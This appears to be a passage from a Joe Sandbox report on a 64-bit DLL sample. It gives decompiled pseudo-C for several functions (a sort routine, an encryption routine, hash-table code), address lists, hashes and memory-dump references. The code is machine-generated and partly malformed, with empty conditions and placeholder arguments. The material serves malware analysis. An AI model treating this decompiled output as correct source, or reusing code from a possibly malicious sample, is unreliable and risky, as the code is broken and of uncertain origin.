				if (_t353 >> 1 != _t333) goto 0xf305b24b;
				if (_t277 == 0) goto 0xf305b2fc;
				_t195 = _t353 - 9;
				if (_t195 > 0) goto 0xf305b307;
				 *(_t378 + 0x30) = _t413;
				_t334 = _t333 - _t277;
				_t52 = _t277 - 1; // -1
				if (_t195 < 0) goto 0xf305b717;
				if (_t427 - _t430 > 0) goto 0xf305b72b;
				_t256 = _t427 + _t334;
				E000007FE7FEF305B7F6( *((intOrPtr*)(_t254 - 4)),  *((intOrPtr*)(_t378 + 0x60)) + _t277 * 8, _t256, _t380, _t353 >> 1);
				if (_t334 == 0) goto 0xf305b2e6;
				if (_t256 - 0xa < 0) goto 0xf305b2a6;
				goto 0xf305b30d;
				goto 0xf305b30d;
				goto 0xf305b30d;
				if (_t380 !=  *((intOrPtr*)(_t378 + 0x50))) goto 0xf305b32e;
				E000007FE7FEF30A611F(0,  *_t254, _t380 -  *((intOrPtr*)(_t378 + 0x50)), _t378 + 0x48, _t380, _t380);
				_t239 = _t52;
				_t418 =  *((intOrPtr*)(_t378 + 0x48));
				_t313 =  *(_t378 + 0x58) << 4;
				 *((long long*)(_t418 + _t313)) = _t239;
				 *(_t418 + _t313 + 8) = _t427;
				_t315 =  *(_t378 + 0x58) + 1;
				 *(_t378 + 0x58) = _t315;
				if (_t315 - 2 < 0) goto 0xf305b654;
				 *((long long*)(_t378 + 0x38)) = _t239;
				_t419 =  *((intOrPtr*)(_t378 + 0x48));
				 *(_t378 + 0x28) = _t419;
				_t400 = _t315 - 1;
				_t282 = _t400 << 4;
				if ( *((long long*)(_t419 + _t282)) == 0) goto 0xf305b3d5;
				_t338 = _t315 << 4;
				_t372 =  *((intOrPtr*)(_t338 + _t419 - 0x18));
				_t240 =  *((intOrPtr*)(_t419 + _t282 + 8));
				if (_t372 - _t240 <= 0) goto 0xf305b3d5;
				if (_t315 - 3 < 0) goto 0xf305b65e;
				_t358 = _t315 - 3;
				_t285 =  *((intOrPtr*)(_t419 + (_t358 << 4) + 8));
				_t381 = _t315;
				if (_t285 - _t240 + _t372 <= 0) goto 0xf305b3f5;
				_t316 = _t381;
				if (_t381 - 4 < 0) goto 0xf305b674;
				if ( *((intOrPtr*)(_t338 + _t419 - 0x38)) - _t372 + _t285 <= 0) goto 0xf305b3f8;
				goto 0xf305b67c;
				_t404 = _t358;
				if (_t316 - 3 < 0) goto 0xf305b3fd;
				goto 0xf305b3f8;
				_t317 = _t381;
				if ( *((intOrPtr*)(_t419 + (_t316 - 3 << 4) + 8)) -  *((intOrPtr*)(_t419 + _t285 + 8)) < 0) goto 0xf305b401;
				_t360 = _t317 - 2;
				_t374 = _t360 + 1;
				_t209 = _t317 - _t374;
				if (_t209 <= 0) goto 0xf305b6e8;
				_t375 = _t374 << 4;
				_t289 =  *((intOrPtr*)(_t419 + _t375));
				_t340 = _t360 << 4;
				_t258 =  *((intOrPtr*)(_t419 + _t340 + 8));
				_t429 =  *((intOrPtr*)(_t419 + _t340)) + _t258;
				if (_t209 < 0) goto 0xf305b705;
				 *(_t378 + 0x30) = _t317;
				if (_t429 - _t430 > 0) goto 0xf305b70e;
				 *(_t378 + 0x90) = _t340;
				 *((long long*)(_t378 + 0x98)) = _t258;
				 *(_t378 + 0xb0) = _t360;
				 *(_t378 + 0xa8) = _t400;
				_t341 =  *((intOrPtr*)(_t419 + _t375 + 8));
				 *(_t378 + 0xa0) = _t289;
				_t407 = _t406 + _t289 * 8;
				_t431 = _t407 + _t341 * 8;
				_t260 = _t429 - _t289 - _t341;
				if (_t260 - _t341 >= 0) goto 0xf305b514;
				_t361 = _t404;
				E000007FE7FEF30F1E10();
				_t383 = _t361 + _t260 * 8;
				if (_t341 <= 0) goto 0xf305b597;
				if (_t260 <= 0) goto 0xf305b597;
				_t342 = _t341;
				_t292 = _t431;
				_t319 = _t383;
				_t433 =  >=  ? _t292 : _t431 + 0xfffffff8;
				_t385 =  <  ? _t319 : _t383 + 0xfffffff8;
				_t320 =  <  ? _t292 : _t319;
				 *((long long*)( *((intOrPtr*)(_t378 + 0x60)) + _t429 * 8)) =  *((intOrPtr*)(( <  ? _t292 : _t319) - 8));
				if (_t433 - _t407 <= 0) goto 0xf305b506;
				_t216 = ( <  ? _t319 : _t383 + 0xfffffff8) - _t361;
				if (( <  ? _t319 : _t383 + 0xfffffff8) - _t361 > 0) goto 0xf305b4d1;
				goto 0xf305b5be;
				_t362 = _t404;
				_t294 = _t404;
				E000007FE7FEF30F1E10();
				if (_t342 <= 0) goto 0xf305b5a7;
				if ( *(_t378 + 0x28) - _t342 <= 0) goto 0xf305b5b6;
				_t343 = _t362;
				sil =  *_t433 -  *_t343 >= 0;
				_t344 =  <  ? _t433 : _t343;
				_t345 =  *((intOrPtr*)( <  ? _t433 : _t343));
				 *_t433 =  *((intOrPtr*)( <  ? _t433 : _t343));
				if (_t343 + _t362 * 8 - _t362 + _t342 * 8 >= 0) goto 0xf305b585;
				_t221 = _t433 + _t294 * 8 -  *((intOrPtr*)(_t378 + 0x68)) + _t429 * 8;
				if (_t221 < 0) goto 0xf305b54f;
				goto 0xf305b5be;
				goto 0xf305b5af;
				goto 0xf305b5be;
				_t426 =  *(_t378 + 0x28);
				E000007FE7FEF30F1E10();
				if (_t221 <= 0) goto 0xf305b6f4;
				_t297 =  *(_t378 + 0x90);
				 *((long long*)(_t297 + _t426)) =  *(_t378 + 0xa0);
				 *((long long*)(_t297 + _t426 + 8)) =  *((intOrPtr*)(_t378 + 0x98)) + _t294;
				E000007FE7FEF30F1E10();
				_t249 =  *(_t378 + 0xa8);
				 *(_t378 + 0x58) = _t249;
				if (_t249 - 1 > 0) goto 0xf305b367;
				r8d = 1;
				goto 0xf305b664;
				goto 0xf305b669;
				r8d = 2;
				if ( *((intOrPtr*)(_t378 + 0x38)) != 0) goto 0xf305b19c;
				goto 0xf305b689;
				r8d = 3;
				goto 0xf305b67f;
				goto 0xf305b669;
				if ( *((long long*)(_t378 + 0x50)) == 0) goto 0xf305b6a5;
				HeapFree(??, ??, ??);
				if ( *(_t378 + 0x70) == 0) goto 0xf305b6d3;
				return HeapFree(??, ??, ??);
			}

0x7fef305b0e2
0x7fef305b0e9
0x7fef305b0ec
0x7fef305b0f3
0x7fef305b0f9
0x7fef305b10b
0x7fef305b117
0x7fef305b11a
0x7fef305b123
0x7fef305b126
0x7fef305b12d
0x7fef305b131
0x7fef305b133
0x7fef305b13e
0x7fef305b143
0x7fef305b148
0x7fef305b152
0x7fef305b159
0x7fef305b15c
0x7fef305b160
0x7fef305b165
0x7fef305b16d
0x7fef305b172
0x7fef305b177
0x7fef305b17c
0x7fef305b181
0x7fef305b189
0x7fef305b18c
0x7fef305b18f
0x7fef305b197
0x7fef305b19f
0x7fef305b1a2
0x7fef305b1a4
0x7fef305b1a7
0x7fef305b1b1
0x7fef305b1b6
0x7fef305b1bd
0x7fef305b1bf
0x7fef305b1cb
0x7fef305b1cd
0x7fef305b1d9
0x7fef305b1de
0x7fef305b1eb
0x7fef305b1fb
0x7fef305b1ff
0x7fef305b207
0x7fef305b20a
0x7fef305b211
0x7fef305b214
0x7fef305b21d
0x7fef305b227
0x7fef305b229
0x7fef305b23c
0x7fef305b245
0x7fef305b24b
0x7fef305b250
0x7fef305b25a
0x7fef305b25e
0x7fef305b262
0x7fef305b266
0x7fef305b269
0x7fef305b273
0x7fef305b280
0x7fef305b282
0x7fef305b289
0x7fef305b28b
0x7fef305b2a3
0x7fef305b2a6
0x7fef305b2b0
0x7fef305b2b9
0x7fef305b2bf
0x7fef305b2c9
0x7fef305b2d4
0x7fef305b2e4
0x7fef305b2f0
0x7fef305b2fa
0x7fef305b305
0x7fef305b312
0x7fef305b31c
0x7fef305b321
0x7fef305b324
0x7fef305b32e
0x7fef305b332
0x7fef305b337
0x7fef305b341
0x7fef305b344
0x7fef305b34d
0x7fef305b353
0x7fef305b358
0x7fef305b362
0x7fef305b367
0x7fef305b36e
0x7fef305b378
0x7fef305b37d
0x7fef305b381
0x7fef305b386
0x7fef305b38e
0x7fef305b394
0x7fef305b39d
0x7fef305b3a8
0x7fef305b3ad
0x7fef305b3b7
0x7fef305b3bd
0x7fef305b3c0
0x7fef305b3ce
0x7fef305b3d0
0x7fef305b3d5
0x7fef305b3dc
0x7fef305b3f3
0x7fef305b3f5
0x7fef305b3fb
0x7fef305b3fd
0x7fef305b401
0x7fef305b405
0x7fef305b408
0x7fef305b40e
0x7fef305b412
0x7fef305b41a
0x7fef305b41e
0x7fef305b42b
0x7fef305b434
0x7fef305b43a
0x7fef305b442
0x7fef305b448
0x7fef305b450
0x7fef305b458
0x7fef305b460
0x7fef305b468
0x7fef305b46d
0x7fef305b475
0x7fef305b479
0x7fef305b480
0x7fef305b486
0x7fef305b494
0x7fef305b49d
0x7fef305b4a2
0x7fef305b4ac
0x7fef305b4b5
0x7fef305b4ce
0x7fef305b4d1
0x7fef305b4d4
0x7fef305b4e5
0x7fef305b4e9
0x7fef305b4ed
0x7fef305b4f5
0x7fef305b4fb
0x7fef305b501
0x7fef305b504
0x7fef305b50f
0x7fef305b51c
0x7fef305b51f
0x7fef305b525
0x7fef305b531
0x7fef305b53b
0x7fef305b54f
0x7fef305b55b
0x7fef305b566
0x7fef305b56a
0x7fef305b56d
0x7fef305b578
0x7fef305b580
0x7fef305b583
0x7fef305b595
0x7fef305b5a5
0x7fef305b5b4
0x7fef305b5b9
0x7fef305b5c4
0x7fef305b5d7
0x7fef305b5e0
0x7fef305b606
0x7fef305b609
0x7fef305b61b
0x7fef305b620
0x7fef305b628
0x7fef305b641
0x7fef305b64c
0x7fef305b652
0x7fef305b65c
0x7fef305b65e
0x7fef305b66c
0x7fef305b672
0x7fef305b674
0x7fef305b67a
0x7fef305b687
0x7fef305b68f
0x7fef305b69f
0x7fef305b6ab
0x7fef305b6cc

APIs

HeapFree.KERNEL32 ref: 000007FEF305B69F

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bbfe670f1490f4bc7890daa079629f79ef6af80bae6de21e86c375c28861678
Instruction ID: 5e5dcfc50967dbfd5a6e8a2d6ffbea5d7d17ea600ab4c2796459d4b463b8109e
Opcode Fuzzy Hash: 6bbfe670f1490f4bc7890daa079629f79ef6af80bae6de21e86c375c28861678
Instruction Fuzzy Hash: 3502B576B19A8589EAD08B16A5083BEA796F344BE4F544323DE6D17BF8DA3CE045D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30649C6 Relevance: 1.6, Strings: 1, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E000007FE7FEF30649C6(long long __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r14;
				signed int _t100;
				void* _t117;
				void* _t118;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t135;
				signed int _t136;
				void* _t137;
				unsigned long long _t140;
				void* _t141;
				void* _t143;
				void* _t147;
				void* _t148;
				long long _t160;
				signed long long _t162;
				void* _t171;
				void* _t172;
				void* _t180;
				void* _t193;
				signed long long _t198;
				signed long long _t204;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				signed long long _t236;
				signed long long _t237;
				intOrPtr _t240;
				intOrPtr _t241;
				signed long long _t242;
				signed long long _t243;
				signed long long _t247;
				intOrPtr* _t248;
				signed long long _t249;
				void* _t250;
				void* _t252;
				void* _t278;
				intOrPtr* _t285;
				long long _t286;
				unsigned long long _t287;
				void* _t290;

				if ( *__rdx != 0) goto 0xf3064f76;
				 *((long long*)(_t250 + 0x78)) = __rcx;
				_t285 = __rdx;
				 *((intOrPtr*)(_t250 + 0x40)) =  *((intOrPtr*)(__r8 + 8));
				 *((long long*)(_t250 + 0x38)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t250 + 0x44)) = 0x1000000;
				 *((long long*)(_t250 + 0x60)) =  *((intOrPtr*)(_t250 + 0x38));
				 *((intOrPtr*)(_t250 + 0x68)) =  *((intOrPtr*)(_t250 + 0x40));
				 *((intOrPtr*)(_t250 + 0x6c)) =  *((intOrPtr*)(_t250 + 0x44));
				 *((intOrPtr*)(_t250 + 0x44)) = 0x2000000;
				asm("xorps xmm0, xmm0");
				asm("movaps [ecx-0x10], xmm0");
				asm("movaps [ecx-0x20], xmm0");
				r8d = 0x100;
				E000007FE7FEF30F1E10();
				r8d = 0x120;
				E000007FE7FEF30F1E10();
				if ( *(_t250 + 0x350) == 0) goto 0xf3064aed;
				_t290 = _t250 + 0xa0;
				_t20 = ( <  ?  *(_t250 + 0x350) : _t232) - 0x10; // 0x0
				_t135 = ( <  ?  *(_t250 + 0x350) : _t232) - 0x10;
				r8d = 0;
				_t252 =  <  ?  ~_t20 : __r8;
				E000007FE7FEF30F24C0();
				E000007FE7FEF30F1E10();
				E000007FE7FEF3064FDE(_t250 + 0x1c0,  *((intOrPtr*)(_t250 + 0xa0)),  *((intOrPtr*)(_t250 + 0xa8)));
				if (_t135 != 0) goto 0xf3064a87;
				_t234 =  *((intOrPtr*)(_t250 + 0x368));
				_t240 =  *((intOrPtr*)(_t250 + 0x358));
				_t286 = _t285 + 0x110;
				_t100 =  *0xf319cfcc; // 0x0
				asm("bt eax, 0x19");
				 *((long long*)(_t250 + 0x58)) = _t286;
				if (_t135 >= 0) goto 0xf3064b7a;
				_t136 =  *0xf319cfcb & 0x00000001;
				if (_t136 == 0) goto 0xf3064b7a;
				if (_t136 == 0) goto 0xf3064b7a;
				_t137 = (_t100 & 0x10400000) - 0x10400000;
				if (_t137 != 0) goto 0xf3064b7a;
				if (_t137 < 0) goto 0xf3064fc0;
				 *((long long*)(_t250 + 0x28)) = _t250 + 0x1c0;
				_t160 = _t250 + 0x38;
				 *((long long*)(_t250 + 0x20)) = _t160;
				0xf30c7340();
				if (_t160 - _t234 > 0) goto 0xf3064fcf;
				_t235 = _t234 - _t160;
				_t247 = _t235 - _t240 & 0xfffffff0;
				r14d = 0xc00;
				_t287 =  <  ? _t247 : _t286;
				_t140 = _t287;
				if (_t140 == 0) goto 0xf3064ccb;
				r15d = 0;
				if (_t140 < 0) goto 0xf3064ef2;
				_t141 = _t287 - _t235 - _t240;
				if (_t141 > 0) goto 0xf3064efe;
				0xf306505c();
				if (_t141 < 0) goto 0xf3064f0a;
				_t193 = _t287 + _t240;
				if (_t193 - _t235 - _t290 > 0) goto 0xf3064f1e;
				_t143 = _t193 - _t240;
				if (_t143 < 0) goto 0xf3064f2c;
				_t162 = _t287 & 0x0000000f;
				 *(_t250 + 0x48) = _t162;
				if (_t143 != 0) goto 0xf3064f46;
				_t220 = _t290 +  *((intOrPtr*)(_t250 + 0x360)) + _t160;
				asm("bt ecx, 0x9");
				asm("bt ecx, 0x19");
				_t164 =  <  ? _t193 : _t162 | 0x00000002;
				_t144 = ( <  ? _t193 : _t162 | 0x00000002) - 1;
				if (( <  ? _t193 : _t162 | 0x00000002) == 1) goto 0xf3064c58;
				if ((0 | _t143 >= 0x00000000) != 2) goto 0xf3064c75;
				 *((long long*)(_t250 + 0x20)) = _t250 + 0x38;
				E000007FE7FEF30C85B0(_t118, 1, 0, 0x10, _t129, _t130, _t131, _t240, _t290 +  *((intOrPtr*)(_t250 + 0x360)) + _t160 +  *((intOrPtr*)(_t250 + 0x358)), _t290 +  *((intOrPtr*)(_t250 + 0x360)) + _t160, _t235, _t240, _t247, _t287 >> 4,  *((intOrPtr*)(_t250 + 0x58)), _t278);
				goto 0xf3064c98;
				 *((long long*)(_t250 + 0x20)) = _t250 + 0x38;
				0xf30c8eb0();
				goto 0xf3064c98;
				 *((long long*)(_t250 + 0x20)) = _t250 + 0x38;
				E000007FE7FEF30E6840(_t290 +  *((intOrPtr*)(_t250 + 0x360)) + _t160 +  *((intOrPtr*)(_t250 + 0x358)), _t220, _t240, _t247, _t287 >> 4,  *((intOrPtr*)(_t250 + 0x58)), _t287);
				asm("bswap eax");
				asm("bswap eax");
				 *((intOrPtr*)(_t250 + 0x44)) =  *((intOrPtr*)(_t250 + 0x44)) + r12d;
				_t171 = _t247 - _t290 + _t287;
				_t288 =  <  ? _t171 : _t287;
				_t147 =  <  ? _t171 : _t287;
				_t241 =  *((intOrPtr*)(_t250 + 0x358));
				if (_t147 != 0) goto 0xf3064ba0;
				_t180 = _t235 - _t247;
				if (_t147 < 0) goto 0xf3064f8b;
				asm("movups xmm0, [esp+0x38]");
				asm("movaps [esp+0x80], xmm0");
				_t148 = _t180 - _t241;
				if (_t148 < 0) goto 0xf3064f9a;
				_t289 =  *((intOrPtr*)(_t250 + 0x58));
				if (_t148 == 0) goto 0xf3064e01;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xa0], xmm0");
				if (_t180 - _t241 - 0x11 >= 0) goto 0xf3064fac;
				_t248 = _t250 + 0xa0;
				E000007FE7FEF30F1E10();
				_t236 =  *_t248;
				_t249 =  *((intOrPtr*)(_t248 + 8));
				_t198 = _t250 + 0x1c0;
				E000007FE7FEF3064FDE(_t198, _t236, _t249);
				asm("bt eax, 0x9");
				asm("bt eax, 0x19");
				_t172 =  >=  ? _t198 | 0x00000002 : _t171;
				if (_t172 == 1) goto 0xf3064d92;
				if (1 != 2) goto 0xf3064db4;
				asm("movaps xmm0, [esp+0x80]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C84E0(_t118, 0 | _t180 - _t241 - 0x00000011 >= 0x00000000, 0, 0x10, _t129, _t130, _t131, 1 - 2, _t180 - _t241, _t250 + 0xa0, _t250 + 0x48, _t236, _t241, _t249,  *((intOrPtr*)(_t250 + 0x58)),  *((intOrPtr*)(_t250 + 0x58)), _t278);
				goto 0xf3064dd4;
				asm("movaps xmm0, [esp+0x80]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C8B00();
				goto 0xf3064dd4;
				asm("movaps xmm0, [esp+0x80]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30E6A00(_t250 + 0xa0, _t250 + 0x48,  *((intOrPtr*)(_t250 + 0x58)));
				 *(_t250 + 0x48) =  *(_t250 + 0x48) ^ _t236;
				 *(_t250 + 0x50) =  *(_t250 + 0x50) ^ _t249;
				asm("movups xmm0, [esp+0x48]");
				asm("movaps [esp+0x90], xmm0");
				asm("movaps [edx], xmm0");
				E000007FE7FEF30F1E10();
				asm("dec eax");
				asm("dec ecx");
				_t242 = _t250 + 0x1c0;
				_t204 = _t242;
				E000007FE7FEF3064FDE(_t204,  *(_t250 + 0x350) << 3,  *((intOrPtr*)(_t250 + 0x368)) - _t241 << 3);
				_t237 =  *_t242;
				_t243 =  *((intOrPtr*)(_t242 + 8));
				asm("bt eax, 0x9");
				asm("bt eax, 0x19");
				_t173 =  >=  ? _t204 | 0x00000002 : _t172;
				_t152 = ( >=  ? _t204 | 0x00000002 : _t172) - 1;
				if (( >=  ? _t204 | 0x00000002 : _t172) == 1) goto 0xf3064e88;
				if (1 != 2) goto 0xf3064eac;
				asm("movaps xmm0, [esp+0x60]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C84E0(_t118, 0xbadbad, 0, 0x10, _t129, _t130, _t131, 1 - 2,  *((intOrPtr*)(_t250 + 0x78)), _t250 + 0xa0, _t250 + 0x48, _t237, _t243, _t249,  *((intOrPtr*)(_t250 + 0x58)),  *((intOrPtr*)(_t250 + 0x58)), _t278);
				goto 0xf3064ec9;
				asm("movaps xmm0, [esp+0x60]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C8B00();
				goto 0xf3064ec9;
				asm("movaps xmm0, [esp+0x60]");
				asm("movaps [ecx], xmm0");
				_t117 = E000007FE7FEF30E6A00(_t250 + 0xa0, _t250 + 0x48, _t289);
				 *(_t250 + 0x48) =  *(_t250 + 0x48) ^ _t237;
				 *(_t250 + 0x50) =  *(_t250 + 0x50) ^ _t243;
				asm("movups xmm0, [esp+0x48]");
				asm("movups [ebx], xmm0");
				return _t117;
			}

0x7fef30649dc
0x7fef30649e5
0x7fef30649ea
0x7fef30649f5
0x7fef30649fc
0x7fef3064a01
0x7fef3064a0e
0x7fef3064a17
0x7fef3064a1f
0x7fef3064a23
0x7fef3064a33
0x7fef3064a36
0x7fef3064a3a
0x7fef3064a3e
0x7fef3064a44
0x7fef3064a59
0x7fef3064a5f
0x7fef3064a6d
0x7fef3064a6f
0x7fef3064a94
0x7fef3064a9b
0x7fef3064a9f
0x7fef3064aa5
0x7fef3064aba
0x7fef3064ac8
0x7fef3064ae0
0x7fef3064aeb
0x7fef3064aed
0x7fef3064afd
0x7fef3064b05
0x7fef3064b0c
0x7fef3064b12
0x7fef3064b16
0x7fef3064b1b
0x7fef3064b1d
0x7fef3064b24
0x7fef3064b2b
0x7fef3064b32
0x7fef3064b37
0x7fef3064b3f
0x7fef3064b51
0x7fef3064b56
0x7fef3064b5b
0x7fef3064b66
0x7fef3064b6e
0x7fef3064b77
0x7fef3064b80
0x7fef3064b84
0x7fef3064b8d
0x7fef3064b91
0x7fef3064b94
0x7fef3064b9a
0x7fef3064ba6
0x7fef3064bac
0x7fef3064baf
0x7fef3064bc4
0x7fef3064bcf
0x7fef3064bd5
0x7fef3064bdc
0x7fef3064be2
0x7fef3064be5
0x7fef3064bee
0x7fef3064bf2
0x7fef3064bf7
0x7fef3064bfd
0x7fef3064c09
0x7fef3064c14
0x7fef3064c1d
0x7fef3064c28
0x7fef3064c2c
0x7fef3064c31
0x7fef3064c44
0x7fef3064c51
0x7fef3064c56
0x7fef3064c61
0x7fef3064c6e
0x7fef3064c73
0x7fef3064c86
0x7fef3064c93
0x7fef3064c9c
0x7fef3064ca1
0x7fef3064ca3
0x7fef3064cb0
0x7fef3064cb6
0x7fef3064cba
0x7fef3064cbd
0x7fef3064cc5
0x7fef3064cce
0x7fef3064cd1
0x7fef3064cd7
0x7fef3064cdc
0x7fef3064ce4
0x7fef3064ce7
0x7fef3064cf0
0x7fef3064cf5
0x7fef3064cfb
0x7fef3064cfe
0x7fef3064d0a
0x7fef3064d17
0x7fef3064d25
0x7fef3064d2a
0x7fef3064d2e
0x7fef3064d32
0x7fef3064d40
0x7fef3064d4d
0x7fef3064d58
0x7fef3064d61
0x7fef3064d69
0x7fef3064d6e
0x7fef3064d70
0x7fef3064d80
0x7fef3064d8b
0x7fef3064d90
0x7fef3064d92
0x7fef3064da2
0x7fef3064dad
0x7fef3064db2
0x7fef3064db4
0x7fef3064dc4
0x7fef3064dcf
0x7fef3064dd4
0x7fef3064dd9
0x7fef3064dde
0x7fef3064de3
0x7fef3064df3
0x7fef3064dfc
0x7fef3064e1c
0x7fef3064e1f
0x7fef3064e22
0x7fef3064e2a
0x7fef3064e2d
0x7fef3064e32
0x7fef3064e35
0x7fef3064e41
0x7fef3064e4c
0x7fef3064e55
0x7fef3064e59
0x7fef3064e5d
0x7fef3064e67
0x7fef3064e69
0x7fef3064e76
0x7fef3064e81
0x7fef3064e86
0x7fef3064e88
0x7fef3064e95
0x7fef3064ea0
0x7fef3064eaa
0x7fef3064eac
0x7fef3064eb9
0x7fef3064ec4
0x7fef3064ec9
0x7fef3064ece
0x7fef3064ed3
0x7fef3064ed8
0x7fef3064ef1

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF3064F2C

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-1586615424
Opcode ID: 06d06eae23615f69895bbb6083115cafcf8eda27ab1abd21b1758dee46657817
Instruction ID: 6dd553272d66b01553948f4d8df2a963e5411e2487c400c04ccc431afd8f99ab
Opcode Fuzzy Hash: 06d06eae23615f69895bbb6083115cafcf8eda27ab1abd21b1758dee46657817
Instruction Fuzzy Hash: 59F1E871A08BC699EAA1DB15E0013FAA3A6F7847D4F544123EA8D53779EB3CD185E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF306CCE0 Relevance: 1.6, Strings: 1, Instructions: 347COMMON

Download Yara Rule

Strings

punycode{-}0, xrefs: 000007FEF306CE1A

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: punycode{-}0
API String ID: 0-2450133883
Opcode ID: ccdc3cceb13ff5b1f2afb2ff9452e51ca307c0d1b8e3cf5e8f4689377392a9a5
Instruction ID: 0f6ca7010492a734ddf556d1f964f5a1bb939128b1e8bf2407ef45da6d5d9696
Opcode Fuzzy Hash: ccdc3cceb13ff5b1f2afb2ff9452e51ca307c0d1b8e3cf5e8f4689377392a9a5
Instruction Fuzzy Hash: FDC10672B08A5559EBA4DA16E44037977E2A388BD0F284133EE4D477F8DA7CE445B740

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF310051D Relevance: 1.6, APIs: 1, Instructions: 303
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E000007FE7FEF310051D(signed int __eax, void* __esi, void* __eflags, signed int __rcx, long long __rdx, long long __r8) {
				char _t88;
				char _t89;
				signed long long _t129;
				void* _t143;
				unsigned long long _t150;
				long long _t152;
				signed long long _t155;
				signed long long _t163;
				signed long long _t176;
				unsigned long long _t181;
				void* _t182;
				void* _t214;
				void* _t223;
				signed long long _t240;
				void* _t241;
				long long _t242;
				intOrPtr _t243;
				long long _t251;
				signed long long _t254;
				signed long long _t256;
				signed long long _t258;
				void* _t259;
				signed long long _t271;
				signed long long _t276;
				long long _t278;
				intOrPtr _t279;
				intOrPtr _t280;

				 *((long long*)(_t259 + 0x38)) = __r8;
				 *((long long*)(_t259 + 0x30)) = __rdx;
				_t278 =  *((intOrPtr*)(__rcx + 0x18));
				_t223 = _t278 + 1;
				if (__eflags == 0) goto 0xf31009a3;
				_t236 = __rcx;
				_t276 =  *__rcx;
				_t4 = _t276 + 1; // 0x5
				_t271 = _t4;
				_t150 =  <  ? _t276 : (_t271 & 0xfffffff8) - (_t271 >> 3);
				_t181 = _t150 >> 1;
				if (_t223 - _t181 <= 0) goto 0xf310059f;
				_t152 =  >  ? _t223 : _t150 + 1;
				if (_t152 - 8 >= 0) goto 0xf3100625;
				goto 0xf3100667;
				 *((long long*)(_t259 + 0x48)) = _t278;
				 *((long long*)(_t259 + 0x50)) = __rcx;
				_t279 =  *((intOrPtr*)(__rcx + 8));
				asm("movdqa xmm0, [0x20a9]");
				if (0 == 0) goto 0xf31005cf;
				_t182 = _t181 + 0xf;
				if (0 < 0) goto 0xf31005f9;
				if (_t182 - _t271 >= 0) goto 0xf31005f9;
				goto 0xf31005de;
				asm("dec eax");
				if (_t182 - _t271 >= 0) goto 0xf31005f9;
				asm("pxor xmm1, xmm1");
				asm("inc cx");
				asm("por xmm1, xmm0");
				asm("inc cx");
				goto 0xf31005b9;
				 *((long long*)(_t259 + 0x40)) = _t152;
				if (_t271 - 0x10 >= 0) goto 0xf31007ae;
				E000007FE7FEF30F1E10();
				_t129 = _t271;
				if (_t129 != 0) goto 0xf31007b9;
				goto 0xf310091f;
				if (_t129 < 0) goto 0xf31009a3;
				asm("dec eax");
				_t25 = _t259 + 0x58; // -232
				_t241 = _t25;
				E000007FE7FEF3076B57(__eax * (_t279 + 0x10) * 0x92492493, _t129, _t241, 0x92492493, 0xbadbae);
				_t242 =  *((intOrPtr*)(_t241 + 8));
				if (_t242 == 0) goto 0xf310093e;
				_t176 =  *((intOrPtr*)(_t259 + 0x58));
				E000007FE7FEF30F24C0();
				_t251 =  *((intOrPtr*)(_t259 + 0x68)) - _t279;
				if (_t271 == 0) goto 0xf3100945;
